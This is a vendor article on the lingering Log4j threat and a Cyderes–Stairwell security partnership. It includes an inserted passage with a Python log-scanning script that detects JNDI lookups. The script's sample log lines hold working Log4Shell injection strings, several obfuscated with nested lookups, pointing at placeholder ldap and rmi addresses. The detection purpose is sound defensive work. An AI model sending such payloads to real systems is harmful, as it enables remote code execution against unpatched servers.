Article contributed by Cody C. of Cyderes’ Special Operations team and Alex Hegyi, Threat Hunter at Stairwell
A year ago this month, the Apache Software Foundation reported the Log4j vulnerability — and the impact was widely and immediately felt. Within 24 hours of the announcement, there were nearly 200,000 attempts to exploit the vulnerability. And within a week, that number grew to more than 1.2 million attacks.
Named after the open-source logging library in which the vulnerability was originally discovered, Log4j exposed a vast array of services and applications. From enterprise platforms to consumer programs alike, it is estimated that one in 10 corporate servers was exposed.
The Log4j vulnerability quickly became ubiquitous because it was so simple to exploit. An attacker only needed to get a single, strategically crafted string written to a log to trigger the vulnerability – and millions of services and devices could be affected.
Although there has been tremendous progress on patching since the initial disclosure, Log4j remains a lingering threat to organizations across the globe. In fact, Check Point Research reports that the Log4j vulnerability continued to impact 41% of organizations as of October 2022. Its impact on supply chains continues to be severe and we have every reason to believe that this exploit will be around for years to come.
The continued influence of Log4j on supply chain attacks
Log4j’s longevity is due to the ripple effect it has had on the software supply chain as a whole. While some companies may struggle to take inventory of all the software that’s used within their organization — creating a blind spot to supply chain attack exposure — the bigger issue stems from the fact that they don’t always have visibility into all the components of software they’re being sold.
By overlooking these details, it’s impossible to understand the risks through the software supply chain, how well the ‘long tail’ of patching has been implemented, which technologies are still exposed to these vulnerabilities, what variants have been created, and more.
Questions remain in the wake of the Log4j vulnerability
Given the ongoing nature of the vulnerability, security leaders remain uncertain of what to expect in the years to come. Some of their most pressing questions include:
- How has Log4j hurt our confidence in how we protect our organizations, and our cybersecurity practitioners and leaders?
- In the midst of an economic downturn, how do we justify the budget to show that we’re a cost-saving center of excellence, rather than just a cost center?
- How do we educate our non-cybersecurity leadership that it’s not an “if we get attacked” but a “when we get attacked” world?
- When the inevitable does happen, do we have a response plan in place to reduce the biggest cost of them all – the time spent finding, understanding, and remediating the event? Lag in response time is what costs organizations the most money.
How the Log4j vulnerability has inspired a surge of innovation
The ongoing threat from exploits such as Log4j was a critical driver behind the mid-2022 creation of a strategic partnership between managed detection and response pioneer Cyderes and Stairwell, developer of the first continuous intelligence, detection, and response platform, Inception.
Inception enables security teams to efficiently identify suspicious artifacts and malware that have evaded point-in-time security controls. The platform continuously analyzes an organization’s environment against the latest threat intelligence from multiple sources and exposes threats that would have otherwise remained undetected. When malware-led attacks are identified, Inception streamlines the triage, investigation, and remediation processes, and simultaneously enables the creation of tailored defenses that attackers can’t test against.
Partnering with Stairwell has allowed Cyderes to further optimize its proprietary Cloud Native Analytics Platform, or CNAP. Delivered as a true Security-as-a-Service offering, CNAP improves analytic effectiveness and overcomes long-standing hurdles of traditional Security Information and Event Management (SIEM) technology. With Inception directly integrated, security operations teams using CNAP are further empowered to outsmart attackers.
In the Log4j case, Cyderes performed threat research to better understand the attack, and used this knowledge to create rules for detection logic, perform threat hunts, and quickly respond when incident response was needed.
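The article describes the vulnerability as a single crafted string that only has to be written to a log, and notes that detection rules and threat hunts were built around it. The following is an added example, not code from the article, Cyderes, or Stairwell, showing the kind of log-side detection logic a threat hunter would write: it approximates a subset of Log4j's lookup evaluation (the `lower:`, `upper:` and `:-` default-value forms) to normalize nested lookups before matching on the well-known `jndi:` indicator, so that case and nesting tricks do not hide the pattern. The sample log lines, IP addresses (documentation range) and function names are constructed for the example.

```python
import re

# Constructed sample web-server log lines (not from the article). Lines 1-4 carry
# JNDI lookups in plain and nested forms; lines 0 and 5 are benign, line 5 even
# contains a harmless Log4j lookup that must not be flagged.
SAMPLE_LOGS = [
    '192.0.2.5 - - [10/Dec/2021:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.9 - - [10/Dec/2021:10:01:23 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    '192.0.2.9 - - [10/Dec/2021:10:01:24 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7/b}"',
    '192.0.2.9 - - [10/Dec/2021:10:01:25 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NOPE:-j}ndi:rmi://203.0.113.7/c}"',
    '192.0.2.9 - - [10/Dec/2021:10:01:26 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.7/d}"',
    '192.0.2.3 - - [10/Dec/2021:10:01:27 +0000] "GET /price?v=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.68"',
]

# An innermost lookup: ${...} whose body contains no further '$', '{' or '}'.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# After normalization, the indicator we hunt for, capturing the scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"jndi\s*:\s*([a-z]+)")


def _resolve(body: str) -> str:
    """Approximate how Log4j would evaluate one innermost ${...} body.

    Only the lookup forms commonly used to obscure the indicator are modelled;
    anything else keeps its text but loses the braces so the rewrite loop terminates.
    """
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${env:NOPE:-j} and ${::-j} evaluate to the default value after ':-'
        return body.split(":-", 1)[1]
    return body


def normalize(text: str, max_passes: int = 10) -> str:
    """Rewrite nested lookups inside-out until nothing changes, then lowercase.

    max_passes bounds the work done on hostile input with very deep nesting.
    """
    for _ in range(max_passes):
        rewritten = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if rewritten == text:
            break
        text = rewritten
    return text.lower()


def scan_line(line: str):
    """Return the JNDI scheme found in a log line after normalization, or None."""
    match = _JNDI.search(normalize(line))
    return match.group(1) if match else None


def scan_lines(lines):
    """Return (line_index, scheme) for every line carrying a JNDI lookup indicator."""
    hits = []
    for index, line in enumerate(lines):
        scheme = scan_line(line)
        if scheme:
            hits.append((index, scheme))
    return hits


if __name__ == "__main__":
    for index, scheme in scan_lines(SAMPLE_LOGS):
        print(f"line {index}: JNDI lookup via {scheme}")
```

Because the normalization only models a handful of lookup forms, treat this as one signal among several: a hit on an outbound-connection scheme such as ldap or rmi is a strong reason to pivot to the host's egress records, but a clean pass does not establish that an unpatched instance was never reached. The inventory and "long tail of patching" problem the article raises is the other half of the picture, and no log rule replaces it.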
What lies ahead?
The Stairwell-Cyderes team continues to deliver expanded visibility into malicious activity that traditional point-in-time defenses miss and empowers our mutual customers with tailor-made defenses that attackers can’t evade.
Solutions like Inception, which didn’t exist when the Log4j exploits first appeared, can help with querying an organization’s entire environment at Google-like speeds. Whether the security team is looking for malicious software, a previously unknown supply chain vulnerability, or even admin credentials in script files, the Inception platform can return results from a search across an organization in seconds to minutes.
The mission of the Cyderes-Stairwell partnership continues to evolve as we address new customer challenges and stay ahead of advanced cyber attacks even beyond Log4j. Take the burgeoning threat from ransomware, for example. While data destruction had been rumored for some time to be where ransomware was headed, no one had seen it in the wild. During a recent incident response, however, Cyderes and Stairwell discovered signs that threat actors were actively in the process of staging and developing this capability, a significant development that received extensive global attention and media coverage.
As cyber threats grow at unprecedented rates, enterprises need the ability to detect and respond to suspicious activity at warp speed. By integrating Cyderes’ proprietary CNAP platform with Inception, we are adding critical capabilities to our service, so that our clients can rest assured their systems are not compromised when the inevitable happens.
For more cybersecurity tips, follow Cyderes on LinkedIn and Twitter.
Take the first step in transforming your cybersecurity program with Cyderes and Stairwell
Cyderes’ world-class capabilities of managed detection and response solutions for the modern enterprise integrate seamlessly with Stairwell’s flagship Inception platform, providing an innovative and truly ground-breaking solution that empowers organizations to stay a step ahead of threat actors. Connect with our team today to learn how we can help you take your security program to the next level.